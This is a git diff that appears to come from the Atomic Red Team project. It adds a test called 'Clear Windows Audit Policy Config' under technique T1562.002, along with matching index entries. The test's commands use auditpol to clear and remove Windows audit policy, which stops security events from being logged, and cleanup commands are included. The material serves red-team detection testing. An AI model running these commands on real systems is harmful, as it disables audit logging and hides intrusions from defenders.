atomics/Indexes/index.yaml | 18 ++++++++++ atomics/T1562.002/T1562.002.md | 35 +++++++++++++++++++ 6 files changed, 57 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2d66174d..cadd757d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -331,6 +331,7 @@ defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS dev defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt +defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 01d6e9ed..75f7c4bc 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -176,6 +176,7 @@ defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS dev defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt +defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 5c7aced5..7a3158b1 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -645,6 +645,7 @@ - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] - Atomic Test #2: Kill Event Log Service Threads [windows] - Atomic Test #3: Impair Windows Audit Log Policy [windows] + - Atomic Test #4: Clear Windows Audit Policy Config [windows] - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #1: Disable iptables firewall [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index bb5efa35..c4604cbe 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -340,6 +340,7 @@ - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] - Atomic Test #2: Kill Event Log Service Threads [windows] - Atomic Test #3: Impair Windows Audit Log Policy [windows] + - Atomic Test #4: Clear Windows Audit Policy Config [windows] - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 728c1876..6c9559e8 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28941,6 +28941,8 @@ defense-evasion: description: | Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. + + Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) supported_platforms: - windows input_arguments: @@ -28996,6 +28998,22 @@ defense-evasion: auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable name: command_prompt elevation_required: true + - name: Clear Windows Audit Policy Config + auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 + description: Clear the Windows audit policy using auditpol utility. This action + would stop certain audit events from being recorded in the security log. + supported_platforms: + - windows + executor: + command: | + auditpol /clear /y + auditpol /remove /allusers + cleanup_command: | + auditpol /set /category:"Account Logon" /success:enable /failure:enable + auditpol /set /category:"Detailed Tracking" /success:enable + auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable + name: command_prompt + elevation_required: true T1562.007: technique: external_references: diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md index 3148b496..6089a6b1 100644 --- a/atomics/T1562.002/T1562.002.md +++ b/atomics/T1562.002/T1562.002.md @@ -12,6 +12,8 @@ Adversaries may targeting system-wide logging or just that of a particular appli - [Atomic Test #3 - Impair Windows Audit Log Policy](#atomic-test-3---impair-windows-audit-log-policy) +- [Atomic Test #4 - Clear Windows Audit Policy Config](#atomic-test-4---clear-windows-audit-policy-config) +
@@ -19,6 +21,8 @@ Adversaries may targeting system-wide logging or just that of a particular appli Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. +Use the cleanup commands to restore some default auditpol settings (your original settings will be lost) + **Supported Platforms:** Windows @@ -116,4 +120,35 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable +
+
+ +## Atomic Test #4 - Clear Windows Audit Policy Config +Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +auditpol /clear /y +auditpol /remove /allusers +``` + +#### Cleanup Commands: +```cmd +auditpol /set /category:"Account Logon" /success:enable /failure:enable +auditpol /set /category:"Detailed Tracking" /success:enable +auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable +``` + + + + +